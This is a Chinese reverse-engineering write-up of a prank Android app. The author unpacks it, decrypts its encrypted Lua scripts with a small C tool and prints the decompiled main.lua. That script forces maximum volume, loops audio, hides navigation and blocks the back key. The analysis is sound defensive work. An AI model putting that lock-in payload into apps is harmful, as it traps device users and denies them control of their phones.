[Android] 「送给最好的 TA」App逆向与Lua脚本解密实例

0x00 事由

最近一些群里出现了会以最大音量外放音频且无法退出的恶搞Android App，造成了一些不好的影响。恰好借这个机会尝试通过逆向工程分析其原理，同时这个App也使用了Lua脚本并进行了加密，也借此机会实践一下Lua脚本解密。

0x01 工具

• Java 运行时环境
• Apktool
• unluac
• IDA
• C/C++ 编译器

下文中会给出Lua脚本的解密代码，需要使用 GCC/Clang 等C/C++ 编译器进行编译后执行。

0x02 基本结构

我们首先使用Apktool对其进行解包，假设App的文件名为App.apk

java -jar apktool.jar d App.apk

等待执行完后，打开解包生成的App文件夹

我们需要关注其中几个文件（夹）

• assets，存放资源文件，包含Lua脚本lua和音频文件mp3
• lib，本地库（Native Library）文件夹，包含编译后的本地代码（Native Code）的so文件
• smail，存放smail文件，包含Dalvik字节码，是对App的Java代码反向成中立字节码的结果
• AndroidManifest.xml，包含App的信息

查看AndroidManifest.xml的内容，可以发现以下样本App信息

• App名为送给最好的TA
• 包名为com.sgzh.dt

0x03 分析Java部分

进入smail，我们可以看到Java部分的代码结构，可以看出存在com.androlua、com.nirenr、com.luajava等包名，搜索相关项目可以发现App的大部分代码均来自于AndroLua_pro。
AndroLua_pro是一个使用Lua编写Android应用的项目，换而言之，Java部分极有可能并不是应用的主体部分，重要操作很有可能会写在Lua中。

除了AndroLua_pro的代码外，我们还发现了com.b.a.a com.b.a.b这两个经过混淆的包名，经过查证得知里面的代码来源于TextWarrior。

我们得知其Java代码基本都是来源于现有项目，无太大分析价值，我们将分析重点放于Lua脚本上。

0x04 分析C部分

在进入Lua部分前，我们使用文本编辑器查看assets文件中的init.lua和main.lua，会发现他们并不是Lua代码，也不是编译后的luac，可以得知Lua脚本被加密了，我们需要先对其进行解密。

AndroLua_Pro所使用的Lua工具LuaJava会加载依赖库libluajava.so，我们使用IDA打开这个文件。LuaJava会使用luaL_loadbuffer或者luaL_loadbufferx函数对Lua脚本进行加载，这个函数也是一个加入Lua脚本解密代码的常见位置，我们在IDA中找到这一函数，并使用自带插件对其进行反编译，可以看到如下内容

（上图为方便阅读，已反混淆变量名）
与AndroLua_pro的原始代码比较，可以发现加入了Lua脚本解密的代码，我们可以参考这一代码，使用C语言编写一个简单的解密工具

#include 
#include 
#include 

unsigned char *decrypt(const unsigned char *buff, size_t size) {
    unsigned char *buff1 = (unsigned char *) malloc(size);
    buff1[0] = 27;
    int t = 0;
    for (int i = 1; i < size; i++) {
        t += size;
        buff1[i] = buff[i] ^ (t
                              + ((unsigned int) (((unsigned long) (-2139062143LL * t) >> 32) + t) >> 7)
                              + ((signed int) (((unsigned long) (-2139062143LL * t) >> 32) + t) < 0));
    }
    return buff1;
}

unsigned char buff[20480];
int main(int argc, char *argv[]) {
    char filename[20] = "main.lua";
    if (argc == 2)
        strcpy(filename,argv[1]);
    printf("File name: %s \n", filename);

    FILE *fp = fopen(filename, "rb");
    size_t size = 0;
    size = fread(buff, sizeof(unsigned char), 20480, fp);
    printf("File size: %ld \n", size);

    unsigned char *res = decrypt(buff, size);

    strcat(filename, "c");
    FILE *fp1 = fopen(filename, "wb");
    fwrite(res, sizeof(unsigned char), size, fp1);
    printf("Output: %s", filename);

    return 0;
}

编译这一代码为decrypt.exe，并拷贝到assets文件夹下，执行以下命令来解密init.lua和main.lua

decrypt init.lua
decrypt main.lua

解密后的文件为init.luac与main.luac，使用文本编辑器观察可以发现其仍然不是Lua代码，而是编译后的luac文件，我们还需要对其进行反编译。

0x05 分析Lua部分

使用unluac可以对luac文件进行反编译，执行以下指令

java -jar unluac.jar init.luac > init-decomp.lua
java -jar unluac.jar main.luac > main-decomp.lua

通过反编译，我们可以得到真正的Lua代码文件init-decomp.lua和main-decomp.lua。
查看init-decomp.lua，代码的用途是声明应用基本信息

local L0_0
appname = "\233\128\129\231\187\153\230\156\128\229\165\189\231\154\132TA"
appver = "1.0"
appcode = "10"
appsdk = "15"
path_pattern = ""
packagename = "com.sgzh.dt"
theme = "Theme_DeviceDefault_Dialog_NoActionBar_MinWidth"
app_key = ""
app_channel = ""
developer = ""
description = ""
debugmode = false
L0_0 = {
  "INTERNET",
  "WRITE_EXTERNAL_STORAGE"
}
user_permission = L0_0

执行具体功能的代码位于main-decomp.lua

require("import")
import("android.app.*")
import("android.os.*")
import("android.widget.*")
import("android.view.*")
import("android.view.View")
import("android.content.Context")
import("android.media.MediaPlayer")
import("android.media.AudioManager")
import("com.androlua.Ticker")
activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI)
activity.getDecorView().setSystemUiVisibility(View.SYSTEM_UI_FLAG_HIDE_NAVIGATION | View.SYSTEM_UI_FLAG_IMMERSIVE)
m = MediaPlayer()
m.reset()
m.setDataSource(activity.getLuaDir() .. "/0.mp3")
m.prepare()
m.start()
m.setLooping(true)
ti = Ticker()
ti.Period = 10
function ti.onTick()
  activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI)
  activity.getDecorView().setSystemUiVisibility(View.SYSTEM_UI_FLAG_HIDE_NAVIGATION | View.SYSTEM_UI_FLAG_IMMERSIVE)
end
ti.start()
function onKeyDown(A0_0, A1_1)
  if string.find(tostring(A1_1), "KEYCODE_BACK") ~= nil then
    activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI)
  end
  return true
end

具体的操作有以下内容

• 将系统音量调至最大
• 隐藏系统导航栏，并进入沉浸模式（全屏）
• 每10tick，重复以上步骤使得无法主动调低音量
• 循环播放音频文件0.mp3
• 阻止使用返回键

0x06 结语

虽然这个App是以恶搞为目的，可能App作者并不存在主观恶意，但是这种行为并不值得提倡，经过QQ群的传播，和病毒已经没有本质上的差距，希望以后可以不再发生这样的事情。
对于用户来说，切记不要安装未知应用，这是保护自己和手机的最根本的手段。